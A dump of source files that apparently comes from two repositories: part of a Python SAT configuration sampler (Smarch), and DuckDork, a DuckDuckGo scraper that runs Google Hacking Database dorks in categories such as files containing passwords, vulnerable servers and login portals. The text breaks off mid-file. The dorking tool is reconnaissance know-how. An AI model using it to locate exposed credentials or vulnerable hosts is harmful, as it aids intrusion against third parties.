samplefile = odir + \"/\" + target + \"_\" + str(n) + \".samples\"\r\n out = True\r\n print(\"Output directory: \" + wdir)\r\n elif opt in (\"-l\", \"--log\"):\r\n start = int(arg)\r\n cache = True\r\n elif opt in (\"-q\", \"--quiet\"):\r\n quiet = True\r\n else:\r\n print(\"Invalid option: \" + opt)\r\n\r\n features, clauses, vcount = read_dimacs(dimacs)\r\n const = list()\r\n if constfile != '':\r\n read_constraints(constfile, features)\r\n\r\n samples = sample(vcount, clauses, n, wdir, const, cache, quiet, samplefile)\r\n\r\n if out:\r\n # f = open(wdir + \"/\" + target + \"_\" + str(n) + \".samples\", 'w')\r\n # for s in samples:\r\n # for v in s:\r\n # f.write(str(v))\r\n # f.write(\",\")\r\n # f.write(\"\\n\")\r\n # f.close()\r\n\r\n print('Output samples created on: ', samplefile)\r\n" }, { "alpha_fraction": 0.4861926734447479, "alphanum_fraction": 0.49269023537635803, "avg_line_length": 29.3150691986084, "blob_id": "c05d109558893265bbb6d1aa621e5dda15685c60", "content_id": "4fbecf87bba42b8e56edcff7ad1f1ee382a6f3b1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16006, "license_type": "permissive", "max_line_length": 153, "num_lines": 511, "path": "/samplers/smarch_mp.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "\"\"\"\r\nSmarch - random sampling of propositional formula solutions\r\nVersion - 0.1\r\n\"\"\"\r\n\r\n\r\nimport random\r\nfrom subprocess import getoutput\r\nimport pycosat\r\nimport os\r\nimport shutil\r\nimport time\r\nimport sys\r\nimport getopt\r\n\r\nimport multiprocessing\r\n\r\n\r\nsrcdir = os.path.dirname(os.path.abspath(__file__))\r\nSHARPSAT = srcdir + '/sharpSATSMARCH/Release/sharpSAT'\r\nMARCH = srcdir + '/march_cu/march_cu'\r\n\r\n\r\ndef read_dimacs(dimacsfile_):\r\n \"\"\"parse variables and clauses from a dimacs file\"\"\"\r\n\r\n _features = list()\r\n _clauses = list()\r\n _vcount = '-1' # required for variables without names\r\n\r\n with open(dimacsfile_) as f:\r\n for line in f:\r\n # read variables in comments\r\n if line.startswith(\"c ind\"): #we do not deal with independant variables produced by other tool - modification w.r.t original SMARCH MP \r\n continue \r\n elif line.startswith(\"c\"):\r\n line = line[0:len(line) - 1]\r\n _feature = line.split(\" \", 4)\r\n del _feature[0]\r\n # handling non-numeric feature IDs - modification w.r.t original SMARCH MP, necessary to parse os-like models with $ in feature names...\r\n if len(_feature) <= 2 and len(_feature) > 0: # needs to deal with literate comments, e.g., in V15 models\r\n \r\n if (_feature[0].isdigit()):\r\n _feature[0] = int(_feature[0])\r\n else:\r\n # num_filter = filter(_feature[0].isdigit(), _feature[0])\r\n num_feature = \"\".join(c for c in _feature[0] if c.isdigit())\r\n _feature[0] = int(num_feature)\r\n _features.append(tuple(_feature))\r\n # read dimacs properties\r\n elif line.startswith(\"p\"):\r\n info = line.split()\r\n _vcount = info[2]\r\n # read clauses\r\n else:\r\n info = line.split()\r\n if len(info) != 0:\r\n _clauses.append(list(map(int, info[:len(info)-1])))\r\n \r\n return _features, _clauses, _vcount\r\n\r\n\r\ndef read_constraints(constfile_, features_):\r\n \"\"\"read constraint file. - means negation\"\"\"\r\n\r\n _const = list()\r\n\r\n if os.path.exists(constfile_):\r\n names = [i[1] for i in features_]\r\n with open(constfile_) as file:\r\n for line in file:\r\n line = line.rstrip()\r\n data = line.split()\r\n if len(data) != 0:\r\n clause = list()\r\n\r\n error = False\r\n for name in data:\r\n prefix = 1\r\n if name.startswith('-'):\r\n name = name[1:len(name)]\r\n prefix = -1\r\n\r\n if name in names:\r\n i = names.index(name)\r\n clause.append(features_[i][0] * prefix)\r\n else:\r\n error = True\r\n clause.append(name)\r\n\r\n if not error:\r\n _const.append(clause)\r\n print(\"Added constraint: \" + line + \" \" + str(clause))\r\n else:\r\n print(\"Feature not found\" + str(clause))\r\n\r\n # line = line[0:len(line) - 1]\r\n # prefix = ''\r\n # if line.startswith('!'):\r\n # line = line[1:len(line)]\r\n # prefix = '-'\r\n #\r\n # # filter features that does not exist\r\n # if line in names:\r\n # i = names.index(line)\r\n # _const.append(prefix + features_[i][0])\r\n # print(\"Added constraint: \" + prefix + features_[i][0] + \",\" + prefix + features_[i][1])\r\n else:\r\n print(\"Constraint file not found\")\r\n\r\n return _const\r\n\r\n\r\ndef get_var(flist, features_):\r\n \"\"\"convert feature names into variables\"\"\"\r\n\r\n _const = list()\r\n names = [i[1] for i in features_]\r\n\r\n for feature in flist:\r\n prefix = 1\r\n if feature.startswith('-'):\r\n feature = feature[1:len(feature)]\r\n prefix = -1\r\n\r\n # filter features that does not exist\r\n if feature in names:\r\n i = names.index(feature)\r\n _const.append(prefix * features_[i][0])\r\n\r\n return _const\r\n\r\n\r\ndef gen_dimacs(vars_, clauses_, constraints_, outfile_):\r\n \"\"\"generate a dimacs file from given clauses and constraints\"\"\"\r\n\r\n f = open(outfile_, 'w')\r\n f.write('p cnf ' + vars_ + ' ' + str(len(clauses_) + len(constraints_)) + '\\n')\r\n\r\n for cl in clauses_:\r\n f.write(\" \".join(str(x) for x in cl) + ' 0 \\n')\r\n\r\n for ct in constraints_:\r\n if isinstance(ct, (list,)):\r\n line = \"\"\r\n for v in ct:\r\n line = line + str(v) + \" \"\r\n f.write(line + '0 \\n')\r\n else:\r\n f.write(str(ct) + ' 0 \\n')\r\n\r\n f.close()\r\n\r\n\r\ndef count(dimacs_, constraints_):\r\n \"\"\"count dimacs solutions with given constraints\"\"\"\r\n\r\n _tempdimacs = os.path.dirname(dimacs_) + '/count.dimacs'\r\n _features, _clauses, _vcount = read_dimacs(dimacs_)\r\n\r\n gen_dimacs(_vcount, _clauses, constraints_, _tempdimacs)\r\n res = int(getoutput(SHARPSAT + ' -q ' + _tempdimacs))\r\n\r\n return res\r\n\r\n\r\ndef checkSAT(dimacs_, constraints_):\r\n \"\"\"check satisfiability of given formula with constraints\"\"\"\r\n _features, _clauses, _vcount = read_dimacs(dimacs_)\r\n cnf = _clauses + constraints_\r\n s = pycosat.solve(cnf)\r\n\r\n if s == 'UNSAT':\r\n return False\r\n else:\r\n return True\r\n\r\n\r\n# partition space by cubes and count number of solutions for each cube\r\ndef partition(assigned_, vcount_, clauses_, wdir_):\r\n _total = 0\r\n _counts = list()\r\n _cubes = list()\r\n _freevar = list()\r\n _dimacsfile = wdir_ + '/dimacs.smarch'\r\n _cubefile = wdir_ + '/cubes.smarch'\r\n\r\n # create dimacs file regarding constraints\r\n gen_dimacs(vcount_, clauses_, assigned_, _dimacsfile)\r\n\r\n # execute march to get cubes\r\n res = getoutput(MARCH + ' ' + _dimacsfile + ' -d 5 -# -o ' + _cubefile)\r\n out = res.split(\"\\n\")\r\n\r\n # print march result (debugging purpose)\r\n #print(out)\r\n\r\n if out[7].startswith('c all'):\r\n _freevar = out[5].split(\": \")[1].split()\r\n\r\n with open(_cubefile) as f:\r\n for _line in f:\r\n _cube = list(_line.split())\r\n if 'a' in _cube:\r\n _cube.remove('a')\r\n if '0' in _cube:\r\n _cube.remove('0')\r\n\r\n _cubes.append(_cube)\r\n\r\n # execute sharpSAT to count solutions\r\n for _cube in _cubes:\r\n gen_dimacs(vcount_, clauses_, assigned_ + _cube, _dimacsfile)\r\n res = int(getoutput(SHARPSAT + ' -q ' + _dimacsfile))\r\n # print(res)\r\n _total += res\r\n _counts.append(res)\r\n\r\n # double check if all variables are free (nonempty freevar means all free)\r\n if _total != pow(2, len(_freevar)):\r\n _freevar.clear()\r\n\r\n return [_freevar, _counts, _cubes, _total]\r\n\r\n\r\ndef master(vcount_, clauses_, n_, wdir_, const_=(), threads_=3, quiet_=False):\r\n \"\"\"generate random numbers and manage sampling processes\"\"\"\r\n\r\n # generate n random numbers for sampling\r\n def get_random(rcount_, total_):\r\n def gen_random():\r\n while True:\r\n yield random.randrange(1, total_, 1)\r\n\r\n def gen_n_unique(source, n__):\r\n seen = set()\r\n seenadd = seen.add\r\n for i in (i for i in source() if i not in seen and not seenadd(i)):\r\n yield i\r\n if len(seen) == n__:\r\n break\r\n\r\n return [i for i in gen_n_unique(gen_random, min(rcount_, int(total_ - 1)))]\r\n\r\n clauses_ = clauses_ + const_\r\n\r\n if not quiet_:\r\n print(\"Counting - \", end='')\r\n freevar = partition([], vcount_, clauses_, wdir_)\r\n\r\n if not quiet_:\r\n print(\"Total configurations: \" + str(freevar[3]))\r\n\r\n # generate random numbers\r\n rands = get_random(n_, freevar[3])\r\n\r\n # partition random numbers for each thread\r\n if threads_ > n_:\r\n threads_ = n_\r\n\r\n chunk = int(n / threads_)\r\n rlist = list()\r\n\r\n for i in range(0, threads_):\r\n rlist.append(list())\r\n\r\n i = 0\r\n for r in rands:\r\n rev = i % threads_\r\n rlist[rev].append(r)\r\n i += 1\r\n\r\n # run sampling processes\r\n samples = list()\r\n with multiprocessing.Manager() as manager:\r\n q = manager.Queue()\r\n plist = list()\r\n\r\n # create processes\r\n for i in range(0, threads_):\r\n plist.append(multiprocessing.Process(target=sample,\r\n args=(q, vcount_, clauses, rlist[i], wdir_, freevar,\r\n quiet_,)))\r\n\r\n # start processes\r\n for p in plist:\r\n p.start()\r\n\r\n # wait until processes are finished\r\n for p in plist:\r\n p.join()\r\n\r\n # gather samples\r\n while not q.empty():\r\n samples.append(q.get())\r\n # sset = q.get()\r\n # for s in sset:\r\n # samples.append(s)\r\n\r\n return samples\r\n\r\n\r\ndef sample(q, vcount_, clauses_, rands_, wdir_, freevar_, quiet_=False):\r\n \"\"\"sample configurations\"\"\"\r\n # create folder for file IO of this process\r\n pid = os.getpid()\r\n _wdir = wdir_ + \"/\" + str(pid)\r\n if not os.path.exists(_wdir):\r\n os.makedirs(_wdir)\r\n\r\n # select a cube based on given random number\r\n def select_cube(counts_, cubes_, number_):\r\n _terminate = False\r\n _index = -1\r\n _i = 0\r\n\r\n for c in counts_:\r\n if number_ <= c:\r\n _index = _i\r\n if c == 1:\r\n _terminate = True\r\n break\r\n else:\r\n number_ -= c\r\n _i += 1\r\n\r\n return cubes_[_index], number_, _terminate\r\n\r\n # assign free variables without recursion\r\n def set_freevar(fv_, number_):\r\n _vars = list()\r\n\r\n for v in fv_:\r\n if number_ % 2 == 1:\r\n _vars.append(v)\r\n else:\r\n _vars.append('-'+v)\r\n number_ //= 2\r\n\r\n return _vars\r\n\r\n # sample for each random number\r\n i = 0\r\n _sample = list()\r\n for r in rands_:\r\n if not quiet_:\r\n print(str(pid) + \": Sampling \" + str(i) + \" with \" + str(r) + \" - \", end='')\r\n sample_time = time.time()\r\n\r\n # initialize variables\r\n number = r\r\n assigned = list()\r\n\r\n if len(freevar_[0]) != 0: # all variables free, sampling done\r\n assigned = assigned + set_freevar(freevar_[0], int(number))\r\n terminate = True\r\n else: # select cube to recurse\r\n cube, number, terminate = select_cube(freevar_[1], freevar_[2], number)\r\n assigned = assigned + cube\r\n\r\n if len(cube) == 0:\r\n print(\"ERROR: cube not selected\")\r\n exit()\r\n\r\n # recurse\r\n while not terminate:\r\n r_freevar = partition(assigned, vcount_, clauses_, _wdir)\r\n\r\n if len(r_freevar[0]) != 0: # all variables free, sampling done\r\n assigned = assigned + set_freevar(r_freevar[0], int(number))\r\n terminate = True\r\n else: # select cube to recurse\r\n cube, number, terminate = select_cube(r_freevar[1], r_freevar[2], number)\r\n assigned = assigned + cube\r\n\r\n if len(cube) == 0:\r\n print(\"ERROR: cube not selected\")\r\n exit()\r\n\r\n # verify if sample is valid and assign dead variables using pycosat\r\n assigned = list(map(int, assigned))\r\n aclause = [assigned[i:i+1] for i in range(0, len(assigned))]\r\n cnf = clauses_ + aclause\r\n s = pycosat.solve(cnf)\r\n\r\n\r\n # print(s)\r\n\r\n if s == 'UNSAT':\r\n print(\"ERROR: Sample Invalid\")\r\n exit(1)\r\n else:\r\n # _sample.append(s)\r\n q.put(s)\r\n\r\n if not quiet_:\r\n print(\"sampling time: \" + str(time.time() - sample_time))\r\n i += 1\r\n\r\n # q.put(_sample)\r\n shutil.rmtree(_wdir)\r\n\r\n return\r\n\r\n\r\n# test script\r\n# n = 10\r\n# target = \"axtls_2_1_4\"\r\n#\r\n# dimacs = \"/home/jeho/kmax/kconfig_case_studies/cases/\" + target + \"/build/kconfig.dimacs\"\r\n# constfile = os.path.dirname(dimacs) + \"/constraints.txt\"\r\n# wdir = os.path.dirname(dimacs) + \"/smarch\"\r\n#\r\n# features, clauses, vcount = read_dimacs(dimacs)\r\n# const = read_constraints(constfile, features)\r\n#\r\n# samples = sample(vcount, clauses, n, wdir, const, True, 1)\r\n\r\n\r\n# run script\r\nif __name__ == \"__main__\":\r\n # get external location for sharpSAT and march if needed\r\n if os.path.exists(srcdir + \"/links.txt\"):\r\n with open(srcdir + \"/links.txt\") as f:\r\n for _line in f:\r\n link = list(_line.split('='))\r\n if len(link) != 0 and link[0][0] != '#':\r\n if link[0] == \"SHARPSAT\":\r\n SHARPSAT = link[1]\r\n elif link[0] == \"MARCH\":\r\n MARCH = link[1]\r\n\r\n # check sharpSAT and march_cu existence\r\n if not os.path.exists(SHARPSAT):\r\n print(\"ERROR: sharpSAT not found\")\r\n\r\n if not os.path.exists(MARCH):\r\n print(\"ERROR: March solver not found\")\r\n\r\n # get parameters from console\r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], \"hc:o:p:q\", ['help', \"cfile=\", \"odir=\", \"threads=\", 'quiet'])\r\n except getopt.GetoptError:\r\n print('smarch.py -c <constfile> -o <outputdir> -p <threads> -q -t | <dimacsfile> <samplecount>')\r\n sys.exit(2)\r\n\r\n if len(args) < 2:\r\n print('smarch.py -c <constfile> -o <outputdir> -p <threads> -q -t | <dimacsfile> <samplecount>')\r\n sys.exit(2)\r\n\r\n dimacs = args[0]\r\n n = int(args[1])\r\n\r\n print('Input file: ', dimacs)\r\n print('Number of samples: ', n)\r\n\r\n wdir = os.path.dirname(dimacs) + \"/smarch\"\r\n constfile = ''\r\n quiet = False\r\n out = False\r\n threads = 1\r\n timeout_sec = None\r\n\r\n # process parameters\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print('smarch.py -c <constfile> -o <outputdir> -p <threads> -q | <dimacsfile> <samplecount>')\r\n sys.exit()\r\n elif opt in (\"-c\", \"--cfile\"):\r\n constfile = arg\r\n print(\"Consraint file: \" + constfile)\r\n elif opt in (\"-o\", \"--odir\"):\r\n wdir = arg\r\n out = True\r\n if not os.path.exists(wdir):\r\n os.makedirs(wdir)\r\n print(\"Output directory: \" + wdir)\r\n elif opt in (\"-p\", \"--threads\"):\r\n threads = int(arg)\r\n elif opt in (\"-q\", \"--quiet\"):\r\n quiet = True\r\n else:\r\n print(\"Invalid option: \" + opt)\r\n\r\n # process dimacs file\r\n features, clauses, vcount = read_dimacs(dimacs)\r\n const = list()\r\n if constfile != '':\r\n read_constraints(constfile, features)\r\n\r\n # sample configurations\r\n start_time = time.time()\r\n samples = master(vcount, clauses, n, wdir, const, threads, quiet)\r\n if not quiet:\r\n print(\"--- total time: %s seconds ---\" % (time.time() - start_time))\r\n\r\n # output samples to a file\r\n base = os.path.basename(dimacs)\r\n target = os.path.splitext(base)[0]\r\n samplefile = wdir + \"/\" + target + \"_\" + str(n) + \".samples\"\r\n\r\n if out:\r\n f = open(wdir + \"/\" + target + \"_\" + str(n) + \".samples\", 'w')\r\n for s in samples:\r\n for v in s:\r\n f.write(str(v))\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n f.close()\r\n\r\n print('Output samples created on: ', samplefile)\r\n\r\n\r\n" } ]
8
edrapac/DuckDork
https://github.com/edrapac/DuckDork
2d70bcb773e5dd80a1b7be64a692ceea1ad10599
138d838700860b560c92792dbf20f4cdfbb627e7
13e04548542508983dbf2c38eedb04bf98628927
refs/heads/master
2023-07-17T08:12:46.350496
2021-09-06T15:20:25
2021-09-06T15:20:25
277,129,015
1
0
null
2020-07-04T14:47:26
2020-07-07T20:18:01
2020-07-13T18:41:29
Python
[ { "alpha_fraction": 0.6574368476867676, "alphanum_fraction": 0.6664172410964966, "avg_line_length": 42.173553466796875, "blob_id": "1ff62ce2a5c3488a0b48b12041f93cbddf449dfb", "content_id": "3f0e42a5004807b6a46320fdb134ae5a7c41eb91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5345, "license_type": "no_license", "max_line_length": 164, "num_lines": 121, "path": "/dork_requests.py", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "import requests\r\nfrom bs4 import BeautifulSoup\r\nimport argparse\r\nimport sys\r\nfrom time import sleep \r\n\r\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"dork\",help='''pass a full dork as an argument, if you want exact searches ie you want the dork to use quotation marks, \r\npass the exact y. PLEASE NOTE THAT EXACT SEARCHES WITH A DORK OFTEN FAIL ie allintext:\"mark zuckerburg\" but exact searches ie \"mark zuckerberg\" do not\\n''',type=str)\r\nparser.add_argument(\"results\",help='number of pages of results you want back. Default is 1 page',const=0,nargs='?',type=int)\r\nparser.add_argument(\"exact\",help='usage of quotes for exact searching',const='n',nargs='?',type=str)\r\nargs = parser.parse_args()\r\nfirst_request = {}\r\nentry = {}\r\npostURL = 'https://html.duckduckgo.com/html/' #POSTS must go to this base url\r\n\r\n \r\ndef get(dork):\r\n\tif args.exact=='y':\r\n\t\tif ':' in args.dork:\r\n\t\t\tdork = args.dork.split(':')[0]+':'+'\\\"'+args.dork.split(':')[1]+'\\\"'\r\n\t\telse:\r\n\t\t\tdork = '\\\"'+args.dork+'\\\"'\r\n\telse:\r\n\t\tdork=args.dork # unless exact is specified requessts does NOT require encapsulating the search term in quotes\r\n\tmydict={'q':dork}\r\n\tbase_url = 'https://html.duckduckgo.com/html'\r\n\tget_request=requests.get(base_url,headers=headers,params=mydict)\r\n\tsoup = BeautifulSoup(get_request.text,'lxml')\r\n\t\r\n\t # if you only want 1 page of results back\r\n\tbase_results=soup.find_all('a',{'class':'result__a'})\r\n\tif len(base_results)==0: # something messed up if this is empty\r\n\t\tprint('Some sort of error has just occurred, this might be but is not limited to a throttle duckduckgo has imposed on you for scraping their engine')\r\n\t\tprint('Returning response now...')\r\n\t\tprint(soup)\r\n\t\tsys.exit(1)\r\n\r\n\tfor i in range(len(base_results)):\r\n\t\tresult_title = base_results[i].text\r\n\t\tresult_url = base_results[i].attrs['href']\r\n\t\tfirst_request.setdefault(result_url,[]).append(result_title)\r\n\r\n\tbase_text = soup.find_all('a',{'class':'result__snippet'})\r\n\tfor i in range(len(base_text)):\r\n\t\tresult_text= base_text[i].text\r\n\t\tfirst_request.setdefault(base_text[i].attrs['href'],[]).append(result_text)\r\n\tif not args.results:\r\n\t\targs.results=1 # if you goof and forget to supply num results \r\n\tif args.results <=1: # if the user wants only 1 page of results returned\r\n\t\tfor keys, values in first_request.items():\r\n\t\t\tprint(values[0])\r\n\t\t\tprint(keys)\r\n\t\t\tprint(values[1]+'\\n\\n')\r\n\t\t\r\n\t\r\n\telse: #if a user wants more than a single page of results\r\n\t\ttry:\r\n\r\n\t\t\tvqd=soup.find(\"input\",{'name':'vqd'}).attrs['value']\r\n\t\t\tq=soup.find(\"input\",{'name':'q'}).attrs['value']\r\n\t\t\ts=soup.find(\"input\",{'name':'s'}).attrs['value'] \r\n\t\t\tnextParams=''\r\n\t\t\tv='l'\r\n\t\t\to='json'\r\n\t\t\tdc=soup.find(\"input\",{'name':'dc'}).attrs['value'] # Initial Offset = (number of page results +1)+number of subsequent results per post\r\n\t\t\tpostParams = {'vqd':vqd,'q':dork,'s':s,'nextParams':'','v':'l','o':'json','dc':dc,'api':'/d.js'}\r\n\r\n\t\t\t\r\n\t\t\t#Make initial POST request and get back the blob of data we want \r\n\t\t\tfor i in range(args.results):\r\n\t\t\t\tsleep(1) # so we dont overload duckduckgo's garbo servers\r\n\r\n\t\t\t\tx=requests.post(postURL,headers=headers,data=postParams)\r\n\t\t\t\tresults = BeautifulSoup(x.text,'lxml')\r\n\t\t\t\tbase_results=results.find_all('a',{'class':'result__a'})\r\n\r\n\t\t\t\t# Update the global entry dict which is used for scenarios in which we have more than 1 page requested \r\n\t\t\t\tfor i in range(len(base_results)):\r\n\t\t\t\t\tresult_title = base_results[i].text\r\n\t\t\t\t\tresult_url = base_results[i].attrs['href']\r\n\t\t\t\t\tentry.setdefault(result_url,[]).append(result_title)\r\n\r\n\t\t\t\tbase_text = results.find_all('a',{'class':'result__snippet'})\r\n\t\t\t\tfor i in range(len(base_text)):\r\n\t\t\t\t\tresult_text= base_text[i].text\r\n\t\t\t\t\tentry.setdefault(base_text[i].attrs['href'],[]).append(result_text)\r\n\t\t\t\t\r\n\t\t\t\t#update our dict we generated with the first request to include results from the nth request \r\n\t\t\t\tfirst_request.update(entry)\r\n\r\n\t\t\t\t#update the postParams that allow us to POST again. Sorta repeating ourselves but not a better way to do this atm\r\n\t\t\t\tvqd=results.find(\"input\",{'name':'vqd'}).attrs['value']\r\n\t\t\t\ts=max([element.get('value') for element in results.find_all(\"input\",{'name':'s'})]) \r\n\t\t\t\tnextParams=''\r\n\t\t\t\tv='l'\r\n\t\t\t\to='json'\r\n\t\t\t\tdc=max([element.get('value') for element in results.find_all(\"input\",{'name':'dc'})])\r\n\t\t\t\tpostParams = {'vqd':vqd,'q':dork,'s':s,'nextParams':'','v':'l','o':'json','dc':dc,'api':'/d.js'} # update our parameters\r\n\t\texcept Exception as e:\r\n\t\t\tprint('''Unable to scroll for more pages. This could mean that your search returned only 1 page of results\r\n\tor that something is blocking this script from scrolling further. Recommended that you search the dork\r\n\tterm manually in a browser to verify this is not an error.\\n\\n''')\r\n\r\n\t\t\t# in the event of an error, print what we have\r\n\t\t\tprint(\"Returning first page of results now...\")\r\n\t\t\tfor keys, values in first_request.items():\r\n\t\t\t\tprint(values[0])\r\n\t\t\t\tprint(keys)\r\n\t\t\t\tprint(values[1]+'\\n\\n')\r\n\t\t\tsys.exit(1)\r\n\t\t\r\n\t\t# if everything goes OK, print all results back to the user\r\n\t\tfor keys, values in first_request.items():\r\n\t\t\tprint(values[0])\r\n\t\t\tprint(keys)\r\n\t\t\tprint(values[1]+'\\n\\n')\r\n\r\nif __name__ == '__main__':\r\n\trun=get(args.dork)\r\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7419354915618896, "avg_line_length": 5.75, "blob_id": "4456bd82a502305ff5162243870ed552c889ad1c", "content_id": "805aab20f79db5be676e25504ff695006c5aee47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 31, "license_type": "no_license", "max_line_length": 8, "num_lines": 4, "path": "/requirements.txt", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "lxml\r\nrequests\r\nbs4\r\nselenium\r\n" }, { "alpha_fraction": 0.6750215888023376, "alphanum_fraction": 0.694900631904602, "avg_line_length": 25, "blob_id": "7abfc8471ce5e70e4bede8412ef417413db42ee2", "content_id": "ca0851f1d0a6dd51f3d4e72205da314bc82d2c88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2314, "license_type": "no_license", "max_line_length": 158, "num_lines": 89, "path": "/quickstart.sh", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eou pipefail\n\necho -ne 'Setting up ghdb... if the dorks folder contains files this step will be skipped. If you need to refresh dork files run the following: \n\\n\\t python3 ghdb_scraper.py -i\\n\\n'\n\nif [[ -z \"$(ls dorks)\" ]]; then\n\techo $(python3 ghdb_scraper.py -i) >&1\nfi\n\necho -ne 'Welcome to quickstart\\n'\n\n\necho -ne 'First please choose a category by typing in a number corresponding to the category\\n\n1: Footholds\n2: File Containing Usernames\n3: Sensitives Directories\n4: Web Server Detection\n5: Vulnerable Files\n6: Vulnerable Servers\n7: Error Messages\n8: File Containing Juicy Info\n9: File Containing Passwords\n10: Sensitive Online Shopping Info\n11: Network or Vulnerability Data\n12: Pages Containing Login Portals\n13: Various Online devices\n14: Advisories and Vulnerabilities\\n\nCategory: '\n\nread category\n\ncase \"$category\" in\n\t'1' )\n\tfile=\"dorks/footholds.dorks\"\t;;\n\t'2' )\n\tfile=\"dorks/files_containing_usernames.dorks\"\t;;\n\t'3' )\n\tfile=\"dorks/sensitive_directories.dorks\"\t;;\n\t'4' )\n\tfile=\"dorks/web_server_detection.dorks\"\t;;\n\t'5' )\n\tfile=\"dorks/vulnerable_files.dorks\"\t;;\n\t'6' )\n\tfile=\"dorks/vulnerable_servers.dorks\"\t;;\n\t'7' )\n\tfile=\"dorks/error_messages.dorks\"\t;;\n\t'8' )\n\tfile=\"dorks/files_containing_juicy_info.dorks\"\t;;\n\t'9' )\n\tfile=\"dorks/files_containing_passwords.dorks\"\t;;\n\t'10' )\n\tfile=\"dorks/sensitive_online_shopping_info.dorks\"\t;;\n\t'11' )\n\tfile=\"dorks/network_or_vulnerability_data.dorks\"\t;;\n\t'12' )\n\tfile=\"dorks/pages_containing_login_portals.dorks\"\t;;\n\t'13' )\n\tfile=\"dorks/various_online_devices.dorks\"\t;;\n\t'14' )\n\tfile=\"dorks/advisories_and_vulnerabilities.dorks\"\t;;\n\nesac\n\n\necho -ne 'Next, choose how many dorks from a category you would like to use. It must be a positive integer, or you can type all to use all dorks in the file\\n\nNumber of dorks: '\n\nread numdorks\n\necho \"You chose $numdorks Dorks\"\nfilelen=$(wc -l \"$file\" | awk -F ' ' '{print $1}')\n\n\nif [ \"$numdorks\" -le \"$filelen\" ] && [ \"$numdorks\" -ge 1 ]; then \n\thead -n \"$numdorks\" \"$file\" > temp\n\tcat temp\n\techo -ne \"$(while read line; do python3 dork_requests.py \"'$line'\"; done < temp)\\n\"; \n\trm temp\n\nelif [[ \"$numdorks\" < 1 ]]; then\n\techo 'must be a positive number'\n\t\nelse\n\techo 'using entire file of dorks'\n\techo -ne \"$(while read line; do python3 dork_requests.py \"'$line'\"; done < \"$file\")\\n\"\n\trm temp\nfi\n" }, { "alpha_fraction": 0.7635270357131958, "alphanum_fraction": 0.7675350904464722, "avg_line_length": 42.77193069458008, "blob_id": "056feafe78e0b5a27d46784d5c1ecdbc231c90bb", "content_id": "9cbb386b57822a1857744903da0e62c5ef4edefe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2495, "license_type": "no_license", "max_line_length": 269, "num_lines": 57, "path": "/README.md", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "# DuckDork\nAutomatic dorking for duckduckgo using the ghdb\n\n## Installation\n\nRunning this from your local machine requires python3 and several modules which can be installed using `pip3 install -r requirements.txt`\n\nIf you plan to use the selenium based version of this script, dork_selenium.py you also need the latest gecko driver which can be [found here](https://github.com/mozilla/geckodriver/releases)\n\nYou will then need to configure line 21 in `dork_selenium.py` to point to the path where you downloaded the driver\n\n## Usage\n\nYou have several options for running this script. \n\n* dork_requests.py\n\n* dork_selenium.py\n\nEach is described in detail (including their use case) below. Additionally there is a `quickstart.sh` script that leverages dork_requests.py and the Google Hacking Database (ghdb) for mass (albeit less precise) dorking \n\n### dork_requests.py\n\nIf you arent sure which to use, this is probably your best bet. The usage for the script is such: \n\n```\nusage: dork_requests.py [-h] dork [results] [exact]\n\npositional arguments:\n dork pass a full dork as an argument, if you want exact searches ie you want the dork to use quotation marks, pass the exact y. PLEASE NOTE THAT EXACT SEARCHES WITH A\n DORK OFTEN FAIL ie allintext:\"mark zuckerburg\" but exact searches ie \"mark zuckerberg\" do not\n results number of pages of results you want back. Default is 1 page\n exact usage of quotes for exact searching\n\noptional arguments:\n -h, --help show this help message and exit\n ```\n\nThus to search for something like `allintext:facebook` and 1 page of results you would use \n\n`python3 dork_requests.py allintext:facebook`\n\nIf you want to search for something that has whitespace such as `allintext:steve jobs` you need to encapsulate the query in single quotes ie \n\n`python3 dork_requests.py 'allintext:steve jobs'`\n\nExact queries, which force DuckDuckGo to only search exact matches on the query string can be enforced by passing the `y` argument. Please note that you *must* specify how many pages you want back. An exact search for a term like `allintext:apple` would thus look like \n\n`python3 dork_requests.py allintext:apple 1 y` which would be the eqivalent of typing \"allintext:apple\" into the DuckDuckGo search bar\n\n### dork_selenium.py\n\nThe same options as above but remember you need the gecko driver installed,for this reason it is recommended the dork_requests.py script be used\n\n### Quickstart.sh\n\nJust follow the on screen prompts!!\n" }, { "alpha_fraction": 0.7445194125175476, "alphanum_fraction": 0.7483136653900146, "avg_line_length": 36.63492202758789, "blob_id": "67c1430feac91dd767597c07954699e8c1c446d8", "content_id": "291cb7db79cd0da792db7fe1da53dc2585cfb933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2372, "license_type": "no_license", "max_line_length": 151, "num_lines": 63, "path": "/dork_selenium.py", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "from selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport urllib.parse\nimport argparse\nimport datetime\nfrom time import sleep\n\n# TODO - Add DNSDumpster scraping if the dork is a URL/domain based dork\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"dork\",help='pass a full dork as an argument, remember quotes need to be escaped, for example allintext:\\\\\"github.com\\\\\"',type=str)\nparser.add_argument(\"results\",help='number of pages of results you want back. Default is 1 page',const=1,nargs='?',type=int)\nargs = parser.parse_args()\n\nprint(\"Term searched for: %s\" %args.dork)\n\n\nencoded_dork = 